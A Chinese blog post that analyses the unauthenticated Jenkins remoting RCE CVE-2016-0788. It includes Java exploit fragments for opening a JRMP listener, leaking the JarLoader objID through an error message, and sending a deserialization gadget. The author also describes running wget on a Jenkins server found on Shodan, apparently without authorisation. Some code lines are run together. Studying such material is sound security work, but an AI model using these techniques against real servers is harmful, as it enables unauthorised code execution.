Jenkins RCE CVE-2016-0788分析及利用

最新推荐文章于 2024-08-20 09:04:02 发布
最新推荐文章于 2024-08-20 09:04:02 发布
阅读量5.9k 收藏
点赞数 1
分类专栏: web渗透测试 java安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011721501/article/details/78548997
版权

Before Read

本文是去年乌云关站前夕在drops上发表的,但是之后的事情大家都知道,非常仓促,估计很多爬虫没有收录此文,我的blog上居然也没有留下,所以特地翻出来备份一下。 

 

0x00 概述
国外的安全研究人员Moritz Bechler在2月份发现了一处Jenkins远程命令执行漏洞,该漏洞无需登录即可利用,也就是CVE-2016-0788。官方公告是这样描述此漏洞的:

 

A vulnerability in the Jenkins remoting module allowed unauthenticated remote attackers to open a JRMP listener on the server hosting the Jenkins master process, which allowed arbitrary code execution.

在分析这个漏洞的时候,运用到了Java RMI知识以及反序列化的问题,并且这个漏洞利用的tricks和攻击执行链路都比较有趣,因此发出来漏洞分析分享一下。

 

 

0x01 基本知识
Jenkins Remoting的相关API是用于实现分布式环境中master和slave节点或者用于访问CLI的。在访问Jenkins页面时,Remoting端口就会在header中找到:

Remoting端口默认是非认证下即可访问,虽然这个端口是动态的,但是可以从Response的头部信息中获取到。
早在去年11月份,breenmachine发布的博客中提及到了这个CLI端口,并且漏洞的触发也是经过了这个端口的反序列化来触发,jenkins也进行了修复。
然而,CVE-2016-0788利用了一些技巧,通过Jenkins Remoting巧妙地开启JRMP,从JRMP对反序列化进行触发,从而完成exploit。
JRMP是Java RMI中支持的其中一个协议,其中也包含了反序列化的功能,实际上,任何Java RPC涉及到按值传递的问题,基本都会采用序列化对象的方式进行实现。下面来看看这个漏洞具体的内容。

 

0x02 漏洞原理
这里首先不得不说一下Jenkins是如何防止反序列化命令执行产生的,在Jenkins-remoting中,有一个ClassFilter类,这个类中定义的一些classpath黑名单,这个黑名单目前看起来是这样的。

都是已知的一些比较著名的gadget。在该漏洞被报告时,官方对这个黑名单进行了完善:

主要针对的RMI相关的类进行了黑名单完善。多插一句,黑名单机制是基于ObjectInputStream扩展出来的一个类ObjectInputStreamEx来实现的:

这里调用了filter对象的check方法,可以去看看相关方法,在hudson.remoting.ClassFilter,文件中的isBlacklisted默认返回false,具体的黑名单机制在RegExpClassFilter中进行实现,子类重写了父类的isBlacklisted方法,增加黑名单校验。
虽然Jenkins的黑名单暂时有效,但是这种机制本身不可靠,因为无法防止潜在的反序列化执行的gadget。
扯远了,我们回到正题。官方针对该漏洞还commit了一个单元测试类,以下的分析都是基于这个单元测试文件中的代码进行说明。
通过分析代码,可以看出Moritz Bechler(漏洞发现者)的思路大致如下:
(1)首先连接CLI端口进行通讯
(2)然后通过Jenkins Remoting在服务器端打开一个JRMP Listener
(3)攻击者客户端连接到这个打开的JRMP端口,通过该端口发送恶意构造的gadget,从而触发漏洞。
以上的操作不涉及Jenkins认证。
思路有了,但是还需要解决如下问题:
(1)如何使得服务器端打开JRMP端口
(2)即使打开JRMP,由于JRMP机制运行在默认的classpath,即使gadget被顺利反序列化,也会因为找不到相关的classpath而无法进行触发
(3)如何通过JRMP协议来执行反序列化操作。
下面通过代码一一进行说明。


0x03 通过JRMP进行反序列化
首先需要让服务器端打开一个JRMP端口,来接收我们后续的反序列化执行对象。这里通过构造一个远程对象进行实现。
相关代码如下:

 

//打开JRMP Listener 
//获取一个UnicastRemoteObject,使得服务器端按要求绑定12345的JRMP端口 
Constructor uroC = UnicastRemoteObject.class.getDeclaredConstructor(); 
uroC.setAccessible(true); 
ReflectionFactory rf = ReflectionFactory.getReflectionFactory(); 
Constructor sc = rf.newConstructorForSerialization(ActivationGroupImpl.class, uroC); 
sc.setAccessible(true);
UnicastRemoteObject uro = (UnicastRemoteObject) sc.newInstance(); 
//设置JRMP端口 
Field portF = UnicastRemoteObject.class.getDeclaredField("port"); 
portF.setAccessible(true); 
portF.set(uro, jrmpPort); 
//设置骨架对象 
Field f = RemoteObject.class.getDeclaredField("ref"); 
f.setAccessible(true); 
//监听JRMP端口 
f.set(uro, new UnicastRef2(new LiveRef(new ObjID(2), 
					new TCPEndpoint("localhost", jrmpPort), true)));

这里运用了反射机制创建一个UnicastRemoteObject的远程对象,并通过设置该对象的ref属性来设置这个远程对象的代理对象。
通过Jenkins Remoting,我们可以将这个远程对象连同这个对象的代理对象部署到服务器端,即使得服务器端打开一个JRMP Listener来监听我们制定的端口,后续工作就是向这个端口发送恶意数据来实现exploit。


0x04 修改classLoader
根据上文所述,JRMP使用的是默认的classLoader,是无法识别反序列化gadget对象的,Commons-collection1,etc. 因此,为了反序列化能够顺利执行命令,我们需要修改JRMP的classLoader为jenkins的JarLoader,但是本地无法直接去查找服务器端中的JarLoader。
在远程方法调用时,需要使用objID对远程对象进行标识,这个objID是随机生成的,爆破是不太可能的。这里用了一个非常有趣的trick,即使用一个异常来获取到JarLoader的objID号,然后根据ID在服务器端获取到这个JarLoader。
具体就是调用hudson.remoting.JarLoader中的isPresentOnRemote方法:
代码如下:

//创建一个RPCRequest对象 
//即执行Checksum类中的isPresentOnRemote方法 
Object o = reqCons .newInstance(oid, JarLoader.class.getMethod("isPresentOnRemote", 
						Class.forName("hudson.remoting.Checksum")), new Object[] { uro, }); 
try { 
	//在服务器端调用
	JarLoader.isPresentOnRemote(Checksum) 
	//会报错出JarLoader的objID 
	c.call((Callable) o); 
} catch ( Exception e ) {
	//从异常信息中获取JarLoader的objID
}

其中传入一个Checksum的对象。由于JarLoader是抽象类,调用抽象方法会报错,报错信息为:

 

 

hudson.remoting.RemotingSystemException: failed to invoke public abstract boolean hudson.remoting.JarLoader.isPresentOnRemote(hudson.remoting.Checksum) on [email protected][ActivationGroupImpl[UnicastServerRef [liveRef: [endpoint:[127.0.1.1:12345](local),objID:[-72a49a0d:15381b90378:-7fec, 3478390807499336137]]]]] at hudson.remoting.RemoteInvocationHandler$RPCRequest.perform(RemoteInvocationHandler.java:610) at hudson.remoting.RemoteInvocationHandler$RPCRequest.call(RemoteInvocationHandler.java:583) ........

可以看到,这里的报错信息中包含了JarLoader的objID号,通过这个ID可以获取到JarLoader在服务器端的实例。


0x05 发送gadget
JRMP是RMI中支持的协议之一,向JRMP发送一个对象执行也需要遵循一定的协议,通过阅读RMI实现的源码探究一下原理:
首先看一下sun.rmi.*下的TCPChannel类。
1.协议头固定形式
写入传输头部的操作:

 

只需要写入Magic和Version字段即可。
2.调用远程对象方法
写入传输字段TransportConstants.Call,用来调用远程对象方法,所以具体看看协议的流程是什么。相关代码在sun.rmi.transport.StreamRemoteCall类中。

在StreamRemoteCall中就有关于方法调用的操作。首先写入TransportConstants.Call字段,标明下面的操作。然后写入对象id,方法索引以及桩对象或者骨架对象的hash,因为JAVA RMI实现中,本地程序与远程主机的方法调用与沟通,实际上是由桩对象和骨架对象进行代理,如果明白Java的动态代理机制,会更好理解,这里就不赘述RMI实现原理了,有兴趣的可以自行搜索相关资料。
相关exploit代码如下:

 

//写入
objIDobjOut.writeLong(obj);
objOut.writeInt(o1);
objOut.writeLong(o2);
objOut.writeShort(o3); 
//调用方法索引
objOut.writeInt(-1);
//stub对象的hash 
objOut.writeLong(Util.computeMethodHash(ActivationInstantiator.class.getMethod("newInstance", ActivationID.class, ActivationDesc.class)));
//发送反序列化
payloadfinal Object object = payload.getObject(payloadArg);
objOut.writeObject(object);


0x06 攻击exploit
根据测试代码,我们不难写出攻击的exploit。从shodan上搜一台Jenkins机器,该机器不存在去年那个粗暴的Jenkins反序列化命令执行漏洞。
我们结合cloudeye,执行wget命令验证。
效果如下:

 

 

 

同时,可以在cloudeye上看到结果:

 

隐形人真忙
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Jenkins文件读取漏洞拾遗(CVE-2024-23897)
离别歌
01-29 955
Jenkins 未授权文件读取漏洞(CVE-2024-23897)上周闹得沸沸扬扬,我也来简单分析一下这个漏洞,并看看这个文件读取如何利用。首先说的是,由于Jenkins存在版本和插件差异,所以利用时可能也有不一样之处,本文内容不一定适用于所有Jenkins server。我们这里使用Vulhub的环境(2.441)来做分析和演示:https://github.com/vulhub/vulhub/...
Jenkins RCE 漏洞(CVE-2019-1003000) 复现
玄道的网安博客
09-24 3481
影响版本 Pipeline: Declarative Plugin up to and including 1.3.4 Pipeline: Groovy Plugin up to and including 2.61 Script Security Plugin up to and including 1.49 环境搭建 复现漏洞CVE-2019-1003000 (Script Security) 测试环境需要安装docker git clone https://github.com.
漏洞分析|死磕Jenkins漏洞回显与利用效果
m0_46699477的博客
06-28 1321
本文以 Jenkins 反序列化漏洞作为优化案例,分享我们的解决漏洞问题的方式。
Jenkins未授权访问漏洞
qq_68186313的博客
08-04 344
默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。二:在打开的URL中.点击 Manage Jenkins–>Scritp Console 在执行以下命令。一、使用以下fofa语法进行产品搜索。Jenkins未授权访问漏洞。
Jenkins漏洞利用复现-CVE-2017-1000353
Xor0ne
08-01 1243
Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件的持续集成变成可能。 Jenkins功能包括: 1、持续的软件版本发布/测试项目。 2、监控外部调用执行的工作。 文章目录1、漏洞描述及环境2、漏洞复现2.1、工具下载2.2、工具利用2.3、检验参考链接: 1、漏洞描述及环境 环境名称: vulfocus/jenkins-cve_2017_1000353 官方复现教程: https://vulhub.org/#/env
漏洞分析|死磕Jenkins漏洞回显与利用效果_jenkins 漏洞
04-12 543
【代码】漏洞分析|死磕Jenkins漏洞回显与利用效果_jenkins 漏洞。
Jenkins未授权访问漏洞复现与 getshell 利用方法汇总
W小哥
09-23 7312
一、Jenkins介绍 1.1 什么是JenkinsJenkins是一个开源的、提供友好操作界面的持续集成(CI)工具,起源于Hudson(Hudson是商用的),主要用于持续、自动的构建/测试软件项目、监控外部任务的运行。Jenkins用Java语言编写,可在Tomcat等流行的servlet容器中运行,也可独立运行。通常与版本管理工具(SCM)、构建工具结合使用。常用的版本控制工具有SVN、GIT,构建工具有Maven、Ant、Gradle。 1.2 Jenkins的功能 Jenkins是一个基于J
cve-2019-1003000-jenkins-rce-poc:Jenkins RCE概念证明:SECURITY-1266 CVE-2019-1003000(脚本安全),CVE-2019-1003001(管道:Groovy),CVE-2019-1003002(管道:声明式)
02-05
PoC:Jenkins RCE SECURITY-1266 / CVE-2019-... 更新: 的文章解释了利用CVE-2018-1000861和CVE-2019-1003000的漏洞利用链,绕过了对预身份验证RCE的总体/读取权限的需求: : 安装 $ git clone https://github.co
CVE-2019-1003000 Jenkins-PreAuth-RCE 复现过程1
08-04
在2019年,一个名为CVE-2019-1003000的安全漏洞被公开,允许未经身份验证的攻击者执行远程代码,即所谓的预认证远程代码执行(PreAuth RCE)。这个漏洞的影响非常严重,因为它无需任何登录凭据即可利用。 漏洞复现...
CVE-2019-1003000 Jenkins RCE 复现
prettyX的博客
06-18 1935
过程 前提,在Kali下安装好docker 准备漏洞环境 git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc.git cd cve-2019-1003000-jenkins-rce-poc pip install -r requirements.txt cd sample-vuln ./run.sh 在进行完上述命令之后,通过如下命令 docker ps 并未发现docker运行实例 通过查.
漏洞复现—Jenkins反序列化漏洞CVE-2017-100035/ CVE-2018-1000861
weixin_45556536的博客
11-17 754
Jenkins反序列化漏洞利用CVE-2017-1000353基础知识漏洞原理影响版本复现思路复现—CVE-2018-10008611、特征检测 基础知识   序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中;反序列化即逆过程,由字节流还原成对象。   Java中的ObjectOutputStream类的writeObject()方法可以实现序列化,ObjectInputStream类的readObject()方法用于反序列化。   形成漏洞的根源在于类ObjectInputStream在反序列
Jenkins RCE 漏洞复现(CVE-2017-1000353、CVE-2018-1000861)
oiadkt的博客
09-21 1944
Jenkins 是软件测试过程中常用的一种持续构建的工具,Jenkins RCE 漏洞触发方式大致分为两种,一种使用 Jenkins CLI 触发,而另一种触发方式为 HTTP 请求触发。这里复现的 CVE-2017-1000353 与 CVE-2018-1000861 就是两种触发方式的代表。
【漏洞复现】Jenkins远程命令执行漏洞(CVE-2018-1000861)
weixin_43486390的博客
12-21 2515
0x01 漏洞介绍 Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。 0x02 影响版本
Jenkins RCE 漏洞复现(CVE-2017-1000353)】
qq_61947585的博客
07-06 315
Jenkins存在未经身份验证的远程代码执行漏洞,经过序列化的Java SignedObject对象传输到基于远程处理的Jenkins CLI,在使用新的对象ObjectInputStream对其进行反序列化操作即可绕过现有的基于黑名单的保护机制。6. 使用 CVE-2017-1000353-SNAPSHOT-all.jar 生成执行反弹 shell 命令的字节码文件 jenkins_poc.ser。这里应该可以监听到,成功反弹shell,但好像机子出现了点问题监听不成功,,
Jenkins弱口令RCE复现渗透测试
kelenwait的博客
06-20 2891
简介 Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成,Jenkins用Java语言编写,可在Tomcat等流行的servlet容器中运行,也可独立运行。通常与版本管理工具(SCM)、构建工具结合使用。 漏洞复现 1.jenkins存在默认口令使用弱口令登录 admin/admin123 2.找到 Manage Jenkins -Tools and Actions - Script Console 点击
Jenkins RCE2(CVE-2016-0788)EXP
angaoux03775的博客
08-16 276
国内应该有这个EXP的不多,需要点JAVA基础,安装好maven之后,配置下就可以了,官网也给出了样例,乌云也给了分析。 转载于:https://www.cnblogs.com/sevck/p/5776287.html...
jenkins未授权rce windows主机getshell
m0_46689007的博客
12-11 1380
由于windows环境,反弹shell不方便,试一下远程下载命令,这里面可以用powershell执行下载命令,从上面我们知道的web绝对路径,下载到根目录下。应该是环境原因连接不了webshell,试试windows环境下的反弹shell,因为目标主机可以执行下载命令,我们下载一个nc,访问存在,上传成功。查看”/dashboard/phpinfo.php”,为phpinfo页面,发现为win10系统,win10基本存在Windows Definder。ip先扫一下全端口,发现只有22,80,443。
Jenkins未授权访问RCE漏洞复现
公众号shadow sock7
02-22 1165
修改默认端口: java -jar jenkins.war --ajp13Port=-1 --httpPort=8081
Jenkins RCE 漏洞 PoC 教程
最新发布
gitblog_00790的博客
08-20 386
Jenkins RCE 漏洞 PoC 教程 cve-2019-1003000-jenkins-rce-pocJenkins RCE Proof-of-Concept: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline...
Jenkins Git client插件CVE-2019-10392:命令执行漏洞分析
Jenkins Git client插件命令执行漏洞(CVE-2019-10392) Jenkins Git client插件是一个广泛使用的工具,它允许Jenkins与Git版本控制系统进行交互,以便在持续集成和持续部署流程中自动获取代码仓库的更新。然而,在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值